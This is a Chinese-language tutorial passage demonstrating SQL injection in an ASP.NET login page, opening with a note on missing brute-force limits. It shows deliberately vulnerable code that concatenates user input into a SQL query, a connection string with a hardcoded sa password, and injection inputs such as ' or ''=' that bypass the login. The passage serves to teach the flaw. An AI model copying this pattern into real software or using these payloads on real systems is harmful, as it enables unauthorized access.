sql注入

六．暴力破解密码

目前的登陆和修改密码，没有错误次数的限制。

Solution: 是否可以加入新的逻辑：单位时间内输入错误次数大于一个数值时，改账号会被冻结。可以由改company的admin 解冻 或者发送申请到 sunnet后由sunnet公司解冻。

1.web.config里加链接字段：

[html] view
plain copy

<configuration>

<connectionStrings >

<add name="myConnectionString"

connectionString="Server=10.231.248.177;Database=testdb;User ID=sa;Password=pa$$word;Trusted_Connection=False;"

providerName="System.Data.SqlClient"/>

</connectionStrings>

2.拖几个控件在form里：

[html] view
plain copy

<form id="form1" runat="server">

<asp:Label ID="LU" runat="server" Text="User Name:"></asp:Label>

<asp:TextBox ID="TBU" runat="server"></asp:TextBox>

<br/>

<asp:Label ID="LP" runat="server" Text="Password:"></asp:Label>

<asp:TextBox ID="TBP" runat="server"></asp:TextBox>

<br/>

<asp:Button ID="Login" runat="server" Text="Login" OnClick="Login_Click" />

<div>

3.写登录事件：

[csharp] view
plain copy

protected void Login_Click(object sender, EventArgs e)

{

using(SqlConnection con = new SqlConnection(WebConfigurationManager.ConnectionStrings["myConnectionString"].ConnectionString))

{

con.Open();

SqlCommand cmd = new SqlCommand();

cmd.CommandText = "SELECT Count(1) FROM [User] where UserName='" + TBU.Text.Trim() + "' and Password='" + TBP.Text.Trim() + "'";

cmd.CommandType = CommandType.Text;

cmd.Connection = con;

int count =(int) cmd.ExecuteScalar();

Response.Write(cmd.CommandText);

if (count > 0)

{

Response.Write("<script>alert('Login pass!');</script>");

}

else

{

Response.Write("<script>alert('Login fail!');</script>");

}

}

}

4.构造SQL注入登录：

用户名输入：test' or ''='

密码输入：' or ''='

或者

用户名输入：test

密码输入：' or ''='

如图：





其他ASP.net SQL注入的例子，如果有兴趣可以参考下：

http://www.aspsnippets.com/Articles/SQL-Injection-Attack-its-examples-and-Prevention-mechanisms-and-Techniques-in-ASPNet.aspx

http://www.codeproject.com/Articles/459324/Understading-SQL-Injection-and-Creating-SQL-Inject

http://blogs.iis.net/nazim/sql-injection-demo

其他的SQL注入：http://www.unixwiz.net/techtips/sql-injection.html